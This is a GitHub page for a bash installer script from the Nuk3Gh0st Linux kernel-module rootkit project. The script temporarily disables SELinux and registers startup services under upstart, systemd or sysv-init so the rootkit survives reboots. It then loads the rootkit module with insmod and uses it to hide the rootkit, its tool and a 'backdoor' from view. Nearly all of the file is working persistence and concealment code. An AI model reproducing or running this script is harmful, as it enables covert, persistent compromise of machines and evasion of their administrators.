forked from juanschallibaum/Nuk3Gh0st
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathenable-nuk3gh0st
177 lines (159 loc) · 6.43 KB
/
enable-nuk3gh0st
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
#!/bin/bash
green='\e[0;32m'
red='\e[0;31m'
purple='\e[0;35m'
yellow='\e[0;33m'
cyan='\e[0;36m'
endColor='\e[0m'
item=${green}[*]${endColor}
function print_banner {
echo ""
echo -e "${green}#################################${endColor}"
echo -e "${green}# Enabling nuk3gh0st at startup #${endColor}"
echo -e "${green}#################################${endColor}"
echo ""
}
function enable_selinux {
echo -e "${item} Reenabling SELINUX"
echo -e " ${purple} cmd: setenforce 1${endColor}"
setenforce 1
echo ""
}
function disable_selinux {
echo -e "${item} Disabling SELINUX temporarily"
echo -e " ${purple} cmd: setenforce 0${endColor}"
setenforce 0
echo ""
}
function create_systemd_service {
echo -e "${item} Coping nuk3gh0st.service to systemd startup scripts directory"
echo -e " ${purple} cmd: cp /usr/share/nuk3gh0st/nuk3gh0st.service /lib/systemd/system/nuk3gh0st.service${endColor}"
cp /usr/share/nuk3gh0st/nuk3gh0st.service /lib/systemd/system/nuk3gh0st.service
echo ""
}
function enable_systemd_service {
echo -e "${item} Enabling nuk3gh0st.service"
echo -e " ${purple} cmd: systemctl enable nuk3gh0st.service${endColor}"
echo -n -e "${cyan}"
systemctl enable nuk3gh0st.service
echo -n -e "${endColor}"
echo ""
#echo -e "${item} Starting nuk3gh0st.service"
#echo -e " ${purple} cmd: service nuk3gh0st start${endColor}"
#echo -n -e "${cyan}"
#service nuk3gh0st start
#echo -n -e "${endColor}"
#echo ""
}
function create_init_service {
echo -e "${item} Coping nuk3gh0st.startup to /etc/init.d/ (sysv-init startup script directory)"
echo -e " ${purple} cmd: cp /usr/share/nuk3gh0st/nuk3gh0st.startup /etc/init.d/nuk3gh0st.startup${endColor}"
cp /usr/share/nuk3gh0st/nuk3gh0st.startup /etc/init.d/nuk3gh0st.startup
echo ""
}
function update_rc_symlinks {
echo -e "${item} Update rc symbolic links to /etc/init.d/nuk3gh0st.startup"
echo -e " ${purple} cmd: update-rc.d nuk3gh0st.startup defaults${endColor}"
echo -n -e "${cyan}"
update-rc.d nuk3gh0st.startup defaults
echo -n -e "${endColor}"
echo ""
}
function create_rc_symlinks {
echo -e "${item} Create symbolic links of nuk3gh0st.startup for run levels from 1 to 5"
echo -e " ${purple} cmd: ln -s /etc/init.d/nuk3gh0st.startup /etc/rc1.d/S98nuk3gh0st.startup${endColor}"
ln -s /etc/init.d/nuk3gh0st.startup /etc/rc1.d/S98nuk3gh0st.startup
echo -e " ${purple} cmd: ln -s /etc/init.d/nuk3gh0st.startup /etc/rc2.d/S98nuk3gh0st.startup${endColor}"
ln -s /etc/init.d/nuk3gh0st.startup /etc/rc2.d/S98nuk3gh0st.startup
echo -e " ${purple} cmd: ln -s /etc/init.d/nuk3gh0st.startup /etc/rc3.d/S98nuk3gh0st.startup${endColor}"
ln -s /etc/init.d/nuk3gh0st.startup /etc/rc3.d/S98nuk3gh0st.startup
echo -e " ${purple} cmd: ln -s /etc/init.d/nuk3gh0st.startup /etc/rc4.d/S98nuk3gh0st.startup${endColor}"
ln -s /etc/init.d/nuk3gh0st.startup /etc/rc4.d/S98nuk3gh0st.startup
echo -e " ${purple} cmd: ln -s /etc/init.d/nuk3gh0st.startup /etc/rc5.d/S98nuk3gh0st.startup${endColor}"
ln -s /etc/init.d/nuk3gh0st.startup /etc/rc5.d/S98nuk3gh0st.startup
echo ""
}
function create_upstart_service {
echo -e "${item} Coping nuk3gh0st.conf to /etc/init/ (Upstart startup script directory)"
echo -e " ${purple} cmd: cp /usr/share/nuk3gh0st/nuk3gh0st.conf /etc/init/nuk3gh0st.conf${endColor}"
cp /usr/share/nuk3gh0st/nuk3gh0st.conf /etc/init/nuk3gh0st.conf
echo ""
}
function enable_startup_service {
echo -e "${item} Detecting init system..."
echo -n -e "${cyan}"
if [[ `/sbin/init --version` =~ upstart ]]; then
echo -n -e "${endColor}"
echo -e "${item} Init system is upstart"
create_upstart_service
elif [[ `systemctl` =~ -\.mount ]]; then
echo -n -e "${endColor}"
echo -e "${item} Init system is systemd"
create_systemd_service
enable_systemd_service
elif [[ -f /etc/init.d/cron && ! -h /etc/init.d/cron ]]; then
echo -n -e "${endColor}"
echo -e "${item} Init system is sysv-init"
create_init_service
update_rc_symlinks
else
echo -n -e "${endColor}"
echo -e "${item} Init system is unrecognized. Trying with sysv-init"
create_init_service
update_rc_symlinks
fi
}
function load_rootkit {
echo -e "${item} Loading nuk3gh0st LKM rootkit"
echo -e " ${purple} cmd: insmod /usr/share/nuk3gh0st/rootkit.ko${endColor}"
insmod /usr/share/nuk3gh0st/rootkit.ko
echo ""
}
function hide_rootkit_files {
echo -e "${item} Hidding nuk3gh0st files"
#echo -e " ${purple} cmd: nuk3gh0st --hide-file=rootkit.ko${endColor}"
#nuk3gh0st --hide-file=rootkit.ko
#echo -e " ${purple} cmd: nuk3gh0st --hide-file=nuk3gh0st${endColor}"
#nuk3gh0st --hide-file=nuk3gh0st
#echo -e " ${purple} cmd: nuk3gh0st --hide-file=load-nuk3gh0st${endColor}"
#nuk3gh0st --hide-file=load-nuk3gh0st
#echo -e " ${purple} cmd: nuk3gh0st --hide-file=unload-nuk3gh0st${endColor}"
#nuk3gh0st --hide-file=unload-nuk3gh0st
#echo -e " ${purple} cmd: nuk3gh0st --hide-file=enable-nuk3gh0st${endColor}"
#nuk3gh0st --hide-file=enable-nuk3gh0st
#echo -e " ${purple} cmd: nuk3gh0st --hide-file=disable-nuk3gh0st${endColor}"
#nuk3gh0st --hide-file=disable-nuk3gh0st
#echo -e " ${purple} cmd: nuk3gh0st --hide-file=nuk3gh0st.startup${endColor}"
#nuk3gh0st --hide-file=nuk3gh0st.startup
#echo -e " ${purple} cmd: nuk3gh0st --hide-file=nuk3gh0st.service${endColor}"
#nuk3gh0st --hide-file=nuk3gh0st.service
#echo -e " ${purple} cmd: nuk3gh0st --hide-file=S99nuk3gh0st.startup${endColor}"
#nuk3gh0st --hide-file=S99nuk3gh0st.startup
echo -e " ${purple} cmd: nuk3gh0st --hide-file=rootkit${endColor}"
nuk3gh0st --hide-file=rootkit
echo -e " ${purple} cmd: nuk3gh0st --hide-file=nuk3gh0st${endColor}"
nuk3gh0st --hide-file=nuk3gh0st
echo -e " ${purple} cmd: nuk3gh0st --hide-file=backdoor${endColor}"
nuk3gh0st --hide-file=backdoor
echo ""
echo -e "${yellow}WARNING: you won't be able to see the installation folder"
echo -e "until you unload the rootkit, but it will still exist "
echo -e "and you can access to it if you remember the path${endColor}"
echo ""
}
print_banner
echo -e "${item} Checking if SELINUX is enabled"
if [ -f /usr/sbin/semanage ]; then
echo -e "${item} SELINUX is enabled"
#semanage permissive -a insmod_t
disable_selinux
enable_startup_service
load_rootkit
hide_rootkit_files
enable_selinux
else
echo -e "${item} SELINUX is disabled"
enable_startup_service
load_rootkit
hide_rootkit_files
fi